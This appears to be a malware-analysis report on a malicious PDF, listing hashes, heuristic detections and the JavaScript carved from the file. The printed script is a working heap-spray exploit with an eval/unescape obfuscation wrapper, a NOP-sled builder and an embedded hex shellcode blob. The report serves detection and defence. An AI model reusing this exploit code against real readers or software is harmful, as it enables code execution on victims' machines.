Malicious PDF — malware analysis report

Static analysis result for SHA-256 d3832b784d321f0d…

MALICIOUS

PDF

2.2 KB First seen: 2026-05-10
MD5: 4782195df6cd58f8081febb991033f99 SHA-1: 1095228cd884bbad37e120743a918d2f536b91a4 SHA-256: d3832b784d321f0d564a026f101d325e72d5c82a87baa1d881000b5acbe6d0c9
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The extracted JavaScript streams, particularly javascript_obj0005_000.js, appear to contain obfuscated code with eval() calls, suggesting an attempt to download and execute a secondary payload. The presence of long encoded blobs and script obfuscation indicators further supports this. The exact payload and delivery mechanism are not fully discernible due to obfuscation, leading to an 'unknown family' classification.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
     function simpleFunction(x, a, b) {
  eval('y = '+a+b+'(x)')
  return y;
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0005_000.js pdf-javascript-stream PDF /JS object 5 at offset 0x117 1676 bytes
SHA-256: 7ac06c03aa21a6ce37292ee4c44679a9d8b0bfe51fac427072fb31d96309a8d0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
// 004: 
	// 002: Antivir HTML/Malicious.PDF.Gen
	function simpleFunction(x, a, b) {
		eval('y = '+a+b+'(x)')
		return y;
	}
	
	function utfenc(s) {
	  var res, endpos;
	  res = ""
	  pos = 0;
	  while (pos < s.length) {
	    if (pos+4 > s.length) {
	      endpos = s.length;
	    } else {
	      endpos = pos+4;
	    }
	    res = res + "%u"+s.substring(pos,endpos);
	    pos = pos + 4;
	  }
	  return res;
	}
	// EOF 002
	
	// 003: Sunbelt	6529	2010.07.01	Exploit.PDF-JS.Gen (v)
        function sh()
        {
            var cs, pl, ns, i;
            var run=new Boolean(true);
            cs = Math.pow(2,15);
            pl = simpleFunction(utfenc("cbd98dbab7a5d95b247433f45ec93ab1ee8331fc1356db0355b638ae40799a25cd8e48e18e24bfb15f708e7eb8f587823be14443835a490cbb5f5e35f316421aad7294b6160202c0be011b591a97c104766beea9e362cfb47316dc3b256c648c4bf8c0a003250a7d17f28c813adb46f0ed7a04494b6512cf7a82f3eafed245c0014f1a5789c049d604482897afec9eaba38698ef5a6a9fb09f6238727f19aae9811d936543f0dd12ce64709a77f168201e82d4e44c2ddfe37a2ff5ff642f5a5c088adc13e1f68baeab6a64d0051db5d274bef158b320b788ae8be9121f38167a9abb25651544ef460fdd88a31afd0ec3fcf4b7efc728ce24ab5579d5207f4153"),'unes','cape');
            ns = simpleFunction(utfenc("0d0d0d0d"),'une','scape');
	    nsl = ns.length;
            while (nsl < cs) {
                ns = ns+ns;
		nsl = ns.length;
	    }
            ns_len = cs - (pl.length + 20);
            ns = ns.substring(0, ns_len);
            hc = new Array();
            i = 0;
	    while (i< 1200) {
	    	hc[i] = ns + pl;
	    	i=i+1;
	    }
        }    
        // EOF 003
	// EOF 004
	 
	
        
        sh();
        tb();
javascript_obj0005_001.js pdf-javascript-stream PDF /JS object 5 at offset 0x117 92 bytes
SHA-256: 35d16bab36df0ea832a5f688a53624a3378306b601952a4fc75073e3989efbfa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// 004: 
	// 002: Antivir HTML/Malicious.PDF.Gen
	function simpleFunction(x, a, b

Open this report in the interactive analyzer, or submit your own file for analysis.